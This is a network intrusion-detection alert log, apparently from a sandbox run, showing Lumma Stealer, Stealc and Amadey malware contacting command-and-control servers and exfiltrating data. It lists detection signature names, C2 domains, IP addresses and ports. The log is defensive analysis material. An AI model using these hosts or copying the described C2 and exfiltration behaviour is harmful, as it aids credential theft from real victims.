2024-11-04T17:32:37.645962+0100	2028371	3	Unknown Traffic	192.168.2.5	50018	104.21.5.155	443	TCP
2024-11-04T17:32:37.648015+0100	2028371	3	Unknown Traffic	192.168.2.5	50019	188.114.97.3	443	TCP
2024-11-04T17:32:38.869653+0100	2028371	3	Unknown Traffic	192.168.2.5	50020	104.21.5.155	443	TCP
2024-11-04T17:32:39.615284+0100	2028371	3	Unknown Traffic	192.168.2.5	50021	188.114.97.3	443	TCP
2024-11-04T17:32:40.364390+0100	2028371	3	Unknown Traffic	192.168.2.5	50022	104.21.5.155	443	TCP
2024-11-04T17:32:40.674350+0100	2028371	3	Unknown Traffic	192.168.2.5	50023	104.21.5.155	443	TCP
2024-11-04T17:32:41.960518+0100	2028371	3	Unknown Traffic	192.168.2.5	50027	104.21.5.155	443	TCP
2024-11-04T17:32:43.755020+0100	2028371	3	Unknown Traffic	192.168.2.5	50032	104.21.5.155	443	TCP
2024-11-04T17:32:44.877591+0100	2028371	3	Unknown Traffic	192.168.2.5	50033	188.114.97.3	443	TCP
2024-11-04T17:32:46.309370+0100	2028371	3	Unknown Traffic	192.168.2.5	50041	104.21.5.155	443	TCP
2024-11-04T17:32:52.621206+0100	2028371	3	Unknown Traffic	192.168.2.5	50063	104.21.5.155	443	TCP
2024-11-04T17:32:56.691691+0100	2028371	3	Unknown Traffic	192.168.2.5	50073	104.21.5.155	443	TCP
2024-11-04T17:33:02.253541+0100	2028371	3	Unknown Traffic	192.168.2.5	50092	104.21.5.155	443	TCP
2024-11-04T17:33:07.862761+0100	2028371	3	Unknown Traffic	192.168.2.5	50129	104.21.5.155	443	TCP
2024-11-04T17:33:09.574554+0100	2028371	3	Unknown Traffic	192.168.2.5	50132	104.21.5.155	443	TCP
2024-11-04T17:33:14.165020+0100	2028371	3	Unknown Traffic	192.168.2.5	50161	104.21.5.155	443	TCP
2024-11-04T17:33:26.277958+0100	2028371	3	Unknown Traffic	192.168.2.5	50172	104.21.5.155	443	TCP
2024-11-04T17:33:28.215926+0100	2028371	3	Unknown Traffic	192.168.2.5	50174	104.21.5.155	443	TCP
2024-11-04T17:33:34.640896+0100	2028371	3	Unknown Traffic	192.168.2.5	50213	104.21.5.155	443	TCP
2024-11-04T17:33:36.894035+0100	2028371	3	Unknown Traffic	192.168.2.5	50216	104.21.5.155	443	TCP
2024-11-04T17:33:38.467803+0100	2028371	3	Unknown Traffic	192.168.2.5	50220	104.21.5.155	443	TCP
2024-11-04T17:36:14.923179+0100	2028371	3	Unknown Traffic	192.168.2.5	50308	104.21.5.155	443	TCP
2024-11-04T17:36:16.365803+0100	2028371	3	Unknown Traffic	192.168.2.5	50309	104.21.5.155	443	TCP
2024-11-04T17:36:17.648147+0100	2028371	3	Unknown Traffic	192.168.2.5	50312	104.21.5.155	443	TCP
2024-11-04T17:36:18.802817+0100	2028371	3	Unknown Traffic	192.168.2.5	50313	13.69.116.108	443	TCP
2024-11-04T17:36:19.066762+0100	2028371	3	Unknown Traffic	192.168.2.5	50314	104.21.5.155	443	TCP
2024-11-04T17:36:20.344699+0100	2028371	3	Unknown Traffic	192.168.2.5	50316	104.21.5.155	443	TCP
2024-11-04T17:36:21.876454+0100	2028371	3	Unknown Traffic	192.168.2.5	50319	104.21.5.155	443	TCP
2024-11-04T17:36:23.547275+0100	2028371	3	Unknown Traffic	192.168.2.5	50320	104.21.5.155	443	TCP
2024-11-04T17:36:26.559919+0100	2028371	3	Unknown Traffic	192.168.2.5	50323	104.21.5.155	443	TCP
2024-11-04T17:36:26.729946+0100	2028371	3	Unknown Traffic	192.168.2.5	50324	104.21.5.155	443	TCP
2024-11-04T17:36:27.785544+0100	2028371	3	Unknown Traffic	192.168.2.5	50325	104.21.5.155	443	TCP
2024-11-04T17:36:29.373734+0100	2028371	3	Unknown Traffic	192.168.2.5	50328	104.21.5.155	443	TCP
2024-11-04T17:36:30.514317+0100	2028371	3	Unknown Traffic	192.168.2.5	50329	104.21.5.155	443	TCP
2024-11-04T17:36:32.100291+0100	2028371	3	Unknown Traffic	192.168.2.5	50331	104.21.5.155	443	TCP
2024-11-04T17:36:33.730646+0100	2028371	3	Unknown Traffic	192.168.2.5	50332	104.21.5.155	443	TCP
2024-11-04T17:36:35.576598+0100	2028371	3	Unknown Traffic	192.168.2.5	50335	104.21.5.155	443	TCP
2024-11-04T17:36:37.539132+0100	2028371	3	Unknown Traffic	192.168.2.5	50337	104.21.5.155	443	TCP
2024-11-04T17:36:59.170555+0100	2028371	3	Unknown Traffic	192.168.2.5	50374	104.21.5.155	443	TCP
2024-11-04T17:37:00.310729+0100	2028371	3	Unknown Traffic	192.168.2.5	50376	104.21.5.155	443	TCP
2024-11-04T17:37:01.600859+0100	2028371	3	Unknown Traffic	192.168.2.5	50377	104.21.5.155	443	TCP
2024-11-04T17:37:03.046202+0100	2028371	3	Unknown Traffic	192.168.2.5	50380	104.21.5.155	443	TCP
2024-11-04T17:37:04.609854+0100	2028371	3	Unknown Traffic	192.168.2.5	50382	104.21.5.155	443	TCP
2024-11-04T17:37:06.053896+0100	2028371	3	Unknown Traffic	192.168.2.5	50383	104.21.5.155	443	TCP
2024-11-04T17:37:07.516808+0100	2028371	3	Unknown Traffic	192.168.2.5	50385	104.21.5.155	443	TCP
2024-11-04T17:37:10.280397+0100	2028371	3	Unknown Traffic	192.168.2.5	50389	104.21.5.155	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-04T17:32:24.625845+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49999	104.21.5.155	443	TCP
2024-11-04T17:32:25.852464+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50001	104.21.5.155	443	TCP
2024-11-04T17:32:27.473167+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50003	188.114.97.3	443	TCP
2024-11-04T17:32:29.350389+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50006	188.114.97.3	443	TCP
2024-11-04T17:32:39.643019+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50020	104.21.5.155	443	TCP
2024-11-04T17:32:40.869605+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50022	104.21.5.155	443	TCP
2024-11-04T17:32:41.234035+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50023	104.21.5.155	443	TCP
2024-11-04T17:32:45.655273+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50033	188.114.97.3	443	TCP
2024-11-04T17:33:03.095654+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50092	104.21.5.155	443	TCP
2024-11-04T17:33:08.559240+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50129	104.21.5.155	443	TCP
2024-11-04T17:33:10.311647+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50132	104.21.5.155	443	TCP
2024-11-04T17:33:39.009749+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50220	104.21.5.155	443	TCP
2024-11-04T17:36:15.663571+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50308	104.21.5.155	443	TCP
2024-11-04T17:36:16.893382+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50309	104.21.5.155	443	TCP
2024-11-04T17:36:27.028511+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50323	104.21.5.155	443	TCP
2024-11-04T17:36:27.310551+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50324	104.21.5.155	443	TCP
2024-11-04T17:36:28.495580+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50325	104.21.5.155	443	TCP
2024-11-04T17:36:38.051591+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50337	104.21.5.155	443	TCP
2024-11-04T17:36:59.613754+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50374	104.21.5.155	443	TCP
2024-11-04T17:37:00.830141+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50376	104.21.5.155	443	TCP
2024-11-04T17:37:10.746270+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50389	104.21.5.155	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-04T17:32:24.625845+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49999	104.21.5.155	443	TCP
2024-11-04T17:32:27.473167+0100	2049836	1	A Network Trojan was detected	192.168.2.5	50003	188.114.97.3	443	TCP
2024-11-04T17:32:39.643019+0100	2049836	1	A Network Trojan was detected	192.168.2.5	50020	104.21.5.155	443	TCP
2024-11-04T17:33:08.559240+0100	2049836	1	A Network Trojan was detected	192.168.2.5	50129	104.21.5.155	443	TCP
2024-11-04T17:36:15.663571+0100	2049836	1	A Network Trojan was detected	192.168.2.5	50308	104.21.5.155	443	TCP
2024-11-04T17:36:27.028511+0100	2049836	1	A Network Trojan was detected	192.168.2.5	50323	104.21.5.155	443	TCP
2024-11-04T17:36:59.613754+0100	2049836	1	A Network Trojan was detected	192.168.2.5	50374	104.21.5.155	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-04T17:32:25.852464+0100	2049812	1	A Network Trojan was detected	192.168.2.5	50001	104.21.5.155	443	TCP
2024-11-04T17:32:29.350389+0100	2049812	1	A Network Trojan was detected	192.168.2.5	50006	188.114.97.3	443	TCP
2024-11-04T17:32:40.869605+0100	2049812	1	A Network Trojan was detected	192.168.2.5	50022	104.21.5.155	443	TCP
2024-11-04T17:33:10.311647+0100	2049812	1	A Network Trojan was detected	192.168.2.5	50132	104.21.5.155	443	TCP
2024-11-04T17:36:16.893382+0100	2049812	1	A Network Trojan was detected	192.168.2.5	50309	104.21.5.155	443	TCP
2024-11-04T17:36:28.495580+0100	2049812	1	A Network Trojan was detected	192.168.2.5	50325	104.21.5.155	443	TCP
2024-11-04T17:37:00.830141+0100	2049812	1	A Network Trojan was detected	192.168.2.5	50376	104.21.5.155	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-04T17:32:23.867133+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	49999	104.21.5.155	443	TCP
2024-11-04T17:32:25.323777+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50001	104.21.5.155	443	TCP
2024-11-04T17:32:27.863212+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50005	104.21.5.155	443	TCP
2024-11-04T17:32:29.353174+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50007	104.21.5.155	443	TCP
2024-11-04T17:32:31.135331+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50011	104.21.5.155	443	TCP
2024-11-04T17:32:33.488349+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50013	104.21.5.155	443	TCP
2024-11-04T17:32:37.645962+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50018	104.21.5.155	443	TCP
2024-11-04T17:32:38.869653+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50020	104.21.5.155	443	TCP
2024-11-04T17:32:40.364390+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50022	104.21.5.155	443	TCP
2024-11-04T17:32:40.674350+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50023	104.21.5.155	443	TCP
2024-11-04T17:32:41.960518+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50027	104.21.5.155	443	TCP
2024-11-04T17:32:43.755020+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50032	104.21.5.155	443	TCP
2024-11-04T17:32:46.309370+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50041	104.21.5.155	443	TCP
2024-11-04T17:32:52.621206+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50063	104.21.5.155	443	TCP
2024-11-04T17:32:56.691691+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50073	104.21.5.155	443	TCP
2024-11-04T17:33:02.253541+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50092	104.21.5.155	443	TCP
2024-11-04T17:33:07.862761+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50129	104.21.5.155	443	TCP
2024-11-04T17:33:09.574554+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50132	104.21.5.155	443	TCP
2024-11-04T17:33:14.165020+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50161	104.21.5.155	443	TCP
2024-11-04T17:33:26.277958+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50172	104.21.5.155	443	TCP
2024-11-04T17:33:28.215926+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50174	104.21.5.155	443	TCP
2024-11-04T17:33:34.640896+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50213	104.21.5.155	443	TCP
2024-11-04T17:33:36.894035+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50216	104.21.5.155	443	TCP
2024-11-04T17:33:38.467803+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50220	104.21.5.155	443	TCP
2024-11-04T17:36:14.923179+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50308	104.21.5.155	443	TCP
2024-11-04T17:36:16.365803+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50309	104.21.5.155	443	TCP
2024-11-04T17:36:17.648147+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50312	104.21.5.155	443	TCP
2024-11-04T17:36:19.066762+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50314	104.21.5.155	443	TCP
2024-11-04T17:36:20.344699+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50316	104.21.5.155	443	TCP
2024-11-04T17:36:21.876454+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50319	104.21.5.155	443	TCP
2024-11-04T17:36:23.547275+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50320	104.21.5.155	443	TCP
2024-11-04T17:36:26.559919+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50323	104.21.5.155	443	TCP
2024-11-04T17:36:26.729946+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50324	104.21.5.155	443	TCP
2024-11-04T17:36:27.785544+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50325	104.21.5.155	443	TCP
2024-11-04T17:36:29.373734+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50328	104.21.5.155	443	TCP
2024-11-04T17:36:30.514317+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50329	104.21.5.155	443	TCP
2024-11-04T17:36:32.100291+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50331	104.21.5.155	443	TCP
2024-11-04T17:36:33.730646+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50332	104.21.5.155	443	TCP
2024-11-04T17:36:35.576598+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50335	104.21.5.155	443	TCP
2024-11-04T17:36:37.539132+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50337	104.21.5.155	443	TCP
2024-11-04T17:36:59.170555+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50374	104.21.5.155	443	TCP
2024-11-04T17:37:00.310729+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50376	104.21.5.155	443	TCP
2024-11-04T17:37:01.600859+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50377	104.21.5.155	443	TCP
2024-11-04T17:37:03.046202+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50380	104.21.5.155	443	TCP
2024-11-04T17:37:04.609854+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50382	104.21.5.155	443	TCP
2024-11-04T17:37:06.053896+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50383	104.21.5.155	443	TCP
2024-11-04T17:37:07.516808+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50385	104.21.5.155	443	TCP
2024-11-04T17:37:10.280397+0100	2057122	1	Domain Observed Used for C2 Detected	192.168.2.5	50389	104.21.5.155	443	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-04T17:32:14.843874+0100	2044696	1	A Network Trojan was detected	192.168.2.5	49984	185.215.113.43	80	TCP
2024-11-04T17:32:25.034905+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50000	185.215.113.43	80	TCP
2024-11-04T17:32:33.841357+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50014	185.215.113.43	80	TCP
2024-11-04T17:32:41.242156+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50024	185.215.113.43	80	TCP
2024-11-04T17:32:52.538411+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50060	185.215.113.43	80	TCP
2024-11-04T17:36:16.701748+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50310	185.215.113.43	80	TCP
2024-11-04T17:36:20.947787+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50317	185.215.113.43	80	TCP
2024-11-04T17:36:25.006462+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50321	185.215.113.43	80	TCP
2024-11-04T17:36:29.368180+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50327	185.215.113.43	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-04T17:32:23.050118+0100	2057129	1	Domain Observed Used for C2 Detected	192.168.2.5	64380	1.1.1.1	53	UDP
2024-11-04T17:32:38.059156+0100	2057129	1	Domain Observed Used for C2 Detected	192.168.2.5	50804	1.1.1.1	53	UDP
2024-11-04T17:33:07.075273+0100	2057129	1	Domain Observed Used for C2 Detected	192.168.2.5	64907	1.1.1.1	53	UDP
2024-11-04T17:36:14.155765+0100	2057129	1	Domain Observed Used for C2 Detected	192.168.2.5	57652	1.1.1.1	53	UDP
2024-11-04T17:36:25.795849+0100	2057129	1	Domain Observed Used for C2 Detected	192.168.2.5	62410	1.1.1.1	53	UDP
2024-11-04T17:36:25.813292+0100	2057129	1	Domain Observed Used for C2 Detected	192.168.2.5	62410	1.1.1.1	53	UDP
2024-11-04T17:36:58.317071+0100	2057129	1	Domain Observed Used for C2 Detected	192.168.2.5	54492	1.1.1.1	53	UDP
2024-11-04T17:36:58.345058+0100	2057129	1	Domain Observed Used for C2 Detected	192.168.2.5	54492	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-04T17:32:23.076923+0100	2057127	1	Domain Observed Used for C2 Detected	192.168.2.5	64374	1.1.1.1	53	UDP
2024-11-04T17:32:38.093671+0100	2057127	1	Domain Observed Used for C2 Detected	192.168.2.5	53665	1.1.1.1	53	UDP
2024-11-04T17:33:07.103509+0100	2057127	1	Domain Observed Used for C2 Detected	192.168.2.5	63414	1.1.1.1	53	UDP
2024-11-04T17:36:14.181796+0100	2057127	1	Domain Observed Used for C2 Detected	192.168.2.5	61880	1.1.1.1	53	UDP
2024-11-04T17:36:25.821208+0100	2057127	1	Domain Observed Used for C2 Detected	192.168.2.5	49772	1.1.1.1	53	UDP
2024-11-04T17:36:58.355915+0100	2057127	1	Domain Observed Used for C2 Detected	192.168.2.5	62720	1.1.1.1	53	UDP
2024-11-04T17:36:58.376465+0100	2057127	1	Domain Observed Used for C2 Detected	192.168.2.5	62720	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-04T17:32:23.160250+0100	2057121	1	Domain Observed Used for C2 Detected	192.168.2.5	61824	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-04T17:32:23.132904+0100	2057123	1	Domain Observed Used for C2 Detected	192.168.2.5	57689	1.1.1.1	53	UDP
2024-11-04T17:32:38.197386+0100	2057123	1	Domain Observed Used for C2 Detected	192.168.2.5	59511	1.1.1.1	53	UDP
2024-11-04T17:33:07.158535+0100	2057123	1	Domain Observed Used for C2 Detected	192.168.2.5	63675	1.1.1.1	53	UDP
2024-11-04T17:36:14.233586+0100	2057123	1	Domain Observed Used for C2 Detected	192.168.2.5	63120	1.1.1.1	53	UDP
2024-11-04T17:36:25.872748+0100	2057123	1	Domain Observed Used for C2 Detected	192.168.2.5	56860	1.1.1.1	53	UDP
2024-11-04T17:36:25.891335+0100	2057123	1	Domain Observed Used for C2 Detected	192.168.2.5	56860	1.1.1.1	53	UDP
2024-11-04T17:36:58.432265+0100	2057123	1	Domain Observed Used for C2 Detected	192.168.2.5	53112	1.1.1.1	53	UDP
2024-11-04T17:36:58.453748+0100	2057123	1	Domain Observed Used for C2 Detected	192.168.2.5	53112	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-04T17:32:23.022241+0100	2057131	1	Domain Observed Used for C2 Detected	192.168.2.5	63001	1.1.1.1	53	UDP
2024-11-04T17:32:36.605710+0100	2057131	1	Domain Observed Used for C2 Detected	192.168.2.5	63506	1.1.1.1	53	UDP
2024-11-04T17:33:07.038102+0100	2057131	1	Domain Observed Used for C2 Detected	192.168.2.5	51563	1.1.1.1	53	UDP
2024-11-04T17:36:14.127435+0100	2057131	1	Domain Observed Used for C2 Detected	192.168.2.5	59120	1.1.1.1	53	UDP
2024-11-04T17:36:25.769545+0100	2057131	1	Domain Observed Used for C2 Detected	192.168.2.5	57055	1.1.1.1	53	UDP
2024-11-04T17:36:58.278233+0100	2057131	1	Domain Observed Used for C2 Detected	192.168.2.5	61000	1.1.1.1	53	UDP
2024-11-04T17:36:58.297747+0100	2057131	1	Domain Observed Used for C2 Detected	192.168.2.5	61000	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-04T17:32:23.104876+0100	2057125	1	Domain Observed Used for C2 Detected	192.168.2.5	62631	1.1.1.1	53	UDP
2024-11-04T17:32:38.170491+0100	2057125	1	Domain Observed Used for C2 Detected	192.168.2.5	57960	1.1.1.1	53	UDP
2024-11-04T17:33:07.133321+0100	2057125	1	Domain Observed Used for C2 Detected	192.168.2.5	52578	1.1.1.1	53	UDP
2024-11-04T17:36:14.207811+0100	2057125	1	Domain Observed Used for C2 Detected	192.168.2.5	57123	1.1.1.1	53	UDP
2024-11-04T17:36:25.846944+0100	2057125	1	Domain Observed Used for C2 Detected	192.168.2.5	62183	1.1.1.1	53	UDP
2024-11-04T17:36:58.391567+0100	2057125	1	Domain Observed Used for C2 Detected	192.168.2.5	63929	1.1.1.1	53	UDP
2024-11-04T17:36:58.422537+0100	2057125	1	Domain Observed Used for C2 Detected	192.168.2.5	63929	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-04T17:32:35.732607+0100	2044245	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.5	50017	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-04T17:32:35.683968+0100	2044244	1	Malware Command and Control Activity Detected	192.168.2.5	50017	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-04T17:32:36.011799+0100	2044246	1	Malware Command and Control Activity Detected	192.168.2.5	50017	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-04T17:32:37.643440+0100	2044248	1	Malware Command and Control Activity Detected	192.168.2.5	50017	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-04T17:32:36.018640+0100	2044247	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.5	50017	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-04T17:32:28.275036+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	50005	104.21.5.155	443	TCP
2024-11-04T17:32:31.224146+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	50009	188.114.97.3	443	TCP
2024-11-04T17:33:14.764745+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	50161	104.21.5.155	443	TCP
2024-11-04T17:36:22.394817+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	50319	104.21.5.155	443	TCP
2024-11-04T17:37:06.423680+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	50383	104.21.5.155	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-04T17:32:35.392993+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50017	185.215.113.206	80	TCP
2024-11-04T17:33:33.473087+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50204	185.215.113.206	80	TCP
2024-11-04T17:33:37.319487+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50215	185.215.113.206	80	TCP
2024-11-04T17:33:38.955645+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50219	185.215.113.206	80	TCP
2024-11-04T17:33:43.972101+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50225	185.215.113.206	80	TCP
2024-11-04T17:33:45.982252+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50227	185.215.113.206	80	TCP
2024-11-04T17:36:20.263034+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50315	185.215.113.206	80	TCP
2024-11-04T17:36:36.156995+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50334	185.215.113.206	80	TCP
2024-11-04T17:36:42.256894+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50357	185.215.113.206	80	TCP
2024-11-04T17:36:47.271589+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50368	185.215.113.206	80	TCP
2024-11-04T17:37:08.735040+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50387	185.215.113.206	80	TCP
2024-11-04T17:37:20.659204+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50414	185.215.113.206	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-04T17:32:03.984121+0100	2856147	1	A Network Trojan was detected	192.168.2.5	49925	185.215.113.43	80	TCP
2024-11-04T17:37:07.230288+0100	2856147	1	A Network Trojan was detected	192.168.2.5	50384	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-04T17:32:13.932142+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.5	49940	TCP
2024-11-04T17:36:15.792623+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.5	50306	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-04T17:32:07.341243+0100	2803305	3	Unknown Traffic	192.168.2.5	49946	31.41.244.11	80	TCP
2024-11-04T17:32:15.769829+0100	2803305	3	Unknown Traffic	192.168.2.5	49990	185.215.113.16	80	TCP
2024-11-04T17:32:25.963115+0100	2803305	3	Unknown Traffic	192.168.2.5	50002	185.215.113.16	80	TCP
2024-11-04T17:32:34.763112+0100	2803305	3	Unknown Traffic	192.168.2.5	50016	185.215.113.16	80	TCP
2024-11-04T17:32:42.214629+0100	2803305	3	Unknown Traffic	192.168.2.5	50026	185.215.113.16	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-04T17:32:38.573360+0100	2803304	3	Unknown Traffic	192.168.2.5	50017	185.215.113.206	80	TCP
2024-11-04T17:33:08.854884+0100	2803304	3	Unknown Traffic	192.168.2.5	50110	185.215.113.206	80	TCP
2024-11-04T17:33:12.385771+0100	2803304	3	Unknown Traffic	192.168.2.5	50110	185.215.113.206	80	TCP
